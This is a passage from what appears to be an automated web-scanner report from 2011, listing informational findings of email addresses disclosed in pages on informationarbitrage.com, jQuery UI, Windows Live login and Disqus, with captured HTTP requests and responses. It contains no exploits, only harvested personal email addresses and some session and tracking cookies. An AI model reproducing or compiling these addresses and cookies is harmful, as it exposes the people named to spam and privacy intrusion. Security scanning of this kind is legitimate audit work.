<p class=\"times\">EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p class=\"times\">EMAIL: julianleone@yahoo.com<\/p>
...[SNIP]...
<p class=\"times\">EMAIL: callenergy@hotmail.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: agustin_mackinlay@yahoo.com<\/p>
...[SNIP]...
<p>EMAIL: econtrarian999@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: dolf@bellsouth.net<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: gameoverman@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: roger@monitor110.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: jboglejr@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: chuff@ha80.net<\/p>
...[SNIP]...
<p>EMAIL: roger@monitor110.com<\/p>
...[SNIP]...
<p>EMAIL: B@sw.net<\/p>
...[SNIP]...
<p>EMAIL: rogere@nyc.rr.com<\/p>
...[SNIP]...
<p>EMAIL: cole@blackstarfunds.com<\/p>
...[SNIP]...
<p>EMAIL: econtrarian999@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: uh.well@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: cmuscarella@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: dustymac@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: tziganejl@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: uysalk@hotmail.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: fn@nazeeri.com<\/p>
...[SNIP]...
<p>EMAIL: benjaminwjones@yahoo.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: mick@seekingalpa.com<\/p>
...[SNIP]...
<p>EMAIL: dan.grossman@sac.com<\/p>
...[SNIP]...
<p>EMAIL: jvance@avondaalepartnersllc.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: blueboxmedia@comcast.net<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: infoarb@mjo.tc<\/p>
...[SNIP]...
<p>EMAIL: gfox25@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: godelmetric@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: tziganejl@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: tziganejl@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: vgodinez@dallasnews.com<\/p>
...[SNIP]...
<p>EMAIL: uh.well@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: khyron4eva@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: shike.jebu@gmail.com<\/p>
...[SNIP]...

26.25. http://informationarbitrage.com/api/read/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://informationarbitrage.com
Path:	/api/read/json

Issue detail

The following email addresses were disclosed in the response:

chuff@ha80.net
elyse@monitor110.com
irvin.sha@gmail.com
roger@iacapitalpartners.com

Request

GET /api/read/json?callback=jsonp1296398930686&num=50&start=200&_=1296398950686 HTTP/1.1
Host: informationarbitrage.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=169606777.1296398928.1.1.utmcsr=news.ycombinator.com|utmccn=(referral)|utmcmd=referral|utmcct=/news; __utma=169606777.1419262746.1296398928.1296398928.1296398928.1; __utmc=169606777; __utmb=169606777.1.10.1296398928; __qca=P0-737707546-1296398931461; _chartbeat2=9zgu329xqu8nir6e

Response

26.26. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The following email addresses were disclosed in the response:

contact@appendTo.com
contact@appendto.com
hello@filamentgroup.com

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 23:41:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

26.27. http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.wlxrs.com
Path:	/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js

Issue detail

The following email address was disclosed in the response:

example555@hotmail.com

Request

GET /~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js HTTP/1.1
Host: js.wlxrs.com
Proxy-Connection: keep-alive
Referer: http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Oct 2010 01:59:53 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Cache-Control: public, max-age=281473221
Expires: Wed, 01 Jan 2020 08:00:00 GMT
Date: Sun, 30 Jan 2011 12:59:39 GMT
Connection: close
Content-Length: 9084

/* Copyright (C) 2010 Microsoft Corporation */g_s["b24"]="sign in";g_s["a0"]="Cancel";g_s["a1"]="Click a Windows Live ID to sign in";g_s["a2"]="Retype your password";g_s["a3"]="Sign in with a partner
...[SNIP]...
correctly.";g_s["b25"]="Other Windows Live IDs";g_s["b52"]="Sign in with a Single use code";g_s["b54"]="Sign in with a Windows Live Hotmail ID";g_s["ii19"]="Password";g_s["ii12"]="Cancel";g_s["ii3"]="example555@hotmail.com";g_s["ii2"]="Windows Live ID:";g_s["ii13"]="Sign in with enhanced security. This may slow your browser speed.";g_s["ii14"]="Use enhanced security (SSL)";g_s["ii11"]="Sign in";g_s["ii9"]="Remember my p
...[SNIP]...
sword is incorrect. Please try again.";g_s["p21"]="Forget me";g_s["o11"]="Don't remember this Windows Live ID.";g_s["o1"]="Alert symbol";g_s["012"]="Sign-in options";g_s["y23"]="Partner ID";g_s["y3"]="example555@hotmail.com";g_s["y2"]="Windows Live ID:";g_s["y4"]="Password:";g_s["y5"]="Forgot your password?";g_s["y6"]="Messenger:";g_s["y8"]="Remember me";g_s["y10"]="Cancel";g_s["y12"]="Use enhanced security (SSL)";g_s["y
...[SNIP]...
gned in";g_s["y22"]="Please type your email address in the format yourname@example.com.";g_s["y0"]="Error symbol";g_s["y1"]="Generic Federation Error Message";g_s["dd35"]="Single use code";g_s["dd5"]="example555@hotmail.com";g_s["dd4"]="Windows Live ID:";g_s["dd6"]="Enter the code";g_s["dd7"]="Request a code";g_s["dd9"]="If you request a new single use code, the previous code won't work. Are you sure you want to refresh
...[SNIP]...

26.28. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifeinc.todayshow.com
Path:	/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Issue detail

The following email address was disclosed in the response:

allisonlinn@msnbc.com

Request

Response

26.29. http://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.live.com
Path:	/login.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:47:54 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H24 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:54 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344874&id=N&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-f2f145b9-7949-4a38-9839-b8a7726474e0; path=/;version=1
X-Frame-Options: deny
Content-Length: 11332



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.30. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 29 Jan 2011 23:12:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:11:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H55 V: 0
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342737&co=1&id=251248; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Vary: Accept-Encoding
Content-Length: 13981



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.31. https://login.live.com/pp900/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/pp900/

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:14 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H36 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:14 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342794&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4c2d8b39-4613-4bc8-bb07-53657b3f42ca; path=/;version=1
X-Frame-Options: deny
Content-Length: 11416



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.32. https://login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:14 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H52 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:14 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-df41315e-45c6-4d60-b893-881795a1cb21; path=/;version=1
X-Frame-Options: deny
Content-Length: 11450



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.33. https://login.live.com/ppsecure/secure.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/secure.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:16 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H45 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:16 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342796&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-23efde8d-b534-4b63-8d36-38dc6e68d0f0; path=/;version=1
X-Frame-Options: deny
Content-Length: 11444



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.34. https://login.silverlight.net/resources/script/omniture/omniture.combined.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/resources/script/omniture/omniture.combined.min.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /resources/script/omniture/omniture.combined.min.js HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=ezlsvr2tttmxii3pjitfng45; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 21 Dec 2010 00:19:52 GMT
Accept-Ranges: bytes
ETag: "b2459c9a4a0cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:26 GMT
Content-Length: 23800

...var s_account = "msstoslvnet"; var omniGuidPath = "://www.iis.net/omniture/analyticsid.aspx"; if (window.location.hostname.toLowerCase().indexOf("silverlight.net") == -1) { var s2 = s_account.split
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

26.35. http://mediacdn.disqus.com/1296297835/build/system/disqus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1296297835/build/system/disqus.js

Issue detail

The following email addresses were disclosed in the response:

anton@disqus.com
oyvind@kinsey.no

Request

GET /1296297835/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-473502224-1295482487215

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 14:47:43 GMT
Expires: Tue, 01 Mar 2011 14:47:43 GMT
Server: Apache/2.2.14 (Ubuntu)
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Vary: Accept-Encoding
X-Origin-Date: Sat, 29 Jan 2011 10:44:41 GMT
X-Origin-Expires: Mon, 28 Feb 2011 10:44:41 GMT
X-Cache-Age: 7956
Content-Type: application/javascript
Last-Modified: Sat, 29 Jan 2011 10:43:21 GMT
X-Cache: HIT from media.disqus.com
X-Cache-Lookup: HIT from media.disqus.com:3128
X-Cache: MISS from cdce-nym011-015.nym011.internap.com
X-Origin-Date: Sun, 30 Jan 2011 12:46:01 GMT
X-Origin-Expires: Tue, 01 Mar 2011 12:46:01 GMT
X-Cache-Age: 7302
X-Cache: HIT from cdce-nym011-014.nym011.internap.com
Via: 1.0 media.disqus.com:3128 (squid), 1.0 cdce-nym011-015.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-014.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive
Content-Length: 168007

var DISQUS;if(typeof DISQUS=="undefined"){throw"Can't find DISQUS"}DISQUS.dtpl=(function(){var a={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>"};a.getGuestFields=function(f){function e(g){r
...[SNIP]...
tListener)}};documentListener=c.events.add(document,"click",f)};c.Tooltip=d;c.ManualTooltip=a})(DISQUS);DISQUS.modules.tooltip=true;
/*
* The MIT License
*
* Copyright (c) 2009 ..yvind Sean Kinsey, oyvind@kinsey.no
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restricti
...[SNIP]...

26.36. http://mediacdn.disqus.com/1296297835/js/dist/lib.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1296297835/js/dist/lib.js

Issue detail

The following email address was disclosed in the response:

oyvind@kinsey.no

Request

GET /1296297835/js/dist/lib.js HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://ajenglish.disqus.com/default.html?xdm_e=http%3A%2F%2Fenglish.aljazeera.net&xdm_c=default1300&xdm_p=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-473502224-1295482487215

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 14:47:47 GMT
Expires: Tue, 01 Mar 2011 14:47:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Vary: Accept-Encoding
X-Origin-Date: Sat, 29 Jan 2011 10:44:27 GMT
X-Origin-Expires: Mon, 28 Feb 2011 10:44:27 GMT
X-Cache-Age: 3495
Content-Type: application/javascript
Last-Modified: Sat, 29 Jan 2011 10:43:16 GMT
X-Cache: HIT from media.disqus.com
X-Cache-Lookup: HIT from media.disqus.com:3128
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
X-Origin-Date: Sun, 30 Jan 2011 09:59:56 GMT
X-Origin-Expires: Tue, 01 Mar 2011 09:59:56 GMT
X-Cache-Age: 17271
X-Cache: HIT from cdce-nym011-010.nym011.internap.com
Via: 1.0 media.disqus.com:3128 (squid), 1.0 cdce-nym011-010.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-010.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive
Content-Length: 105726

/*
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
<e.length;j++){k.removeAttribute(e[j].name)}k.save(d)}}}}}catch(f){}return c})()});
/*
* The MIT License
*
* Copyright (c) 2009 ..yvind Sean Kinsey, oyvind@kinsey.no
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restricti
...[SNIP]...

26.37. http://money.redacted/common/welcome-to-the-new-msn-money.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/common/welcome-to-the-new-msn-money.aspx

Issue detail

The following email address was disclosed in the response:

msnmcs@microsoft.com

Request

Response

26.38. http://money.redacted/currency/2011-the-year-of-wild-speculation-fleckenstein.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/currency/2011-the-year-of-wild-speculation-fleckenstein.aspx

Issue detail

The following email address was disclosed in the response:

msnmcs@microsoft.com

Request

Response

26.39. http://money.redacted/how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx

Issue detail

The following email address was disclosed in the response:

msnmcs@microsoft.com

Request

Response

26.40. http://money.redacted/investing/10-reasons-to-love-rising-prices-jubak.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/investing/10-reasons-to-love-rising-prices-jubak.aspx

Issue detail

The following email address was disclosed in the response:

msnmcs@microsoft.com

Request

Response

26.41. http://money.redacted/mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx

Issue detail

The following email address was disclosed in the response:

msnmcs@microsoft.com

Request

Response

26.42. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The following email address was disclosed in the response:

heymsn@microsoft.com

Request

Response

26.43. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Issue detail

The following email address was disclosed in the response:

heymsn@microsoft.com

Request

Response

26.44. https://msnia.login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://msnia.login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:14:43 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSMLGN1C04 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:13:43 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Content-Length: 11551



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.45. http://news.sciencemag.org/scienceinsider/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.sciencemag.org
Path:	/scienceinsider/

Issue detail

The following email address was disclosed in the response:

news-info@aaas.org

Request

GET /scienceinsider/ HTTP/1.1
Host: news.sciencemag.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.46. http://openchannel.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://openchannel.msnbc.redacted
Path:	/

Issue detail

The following email addresses were disclosed in the response:

NewsInvestigates@nbcuni.com
bill.dedman@msnbc.com

Request

GET / HTTP/1.1
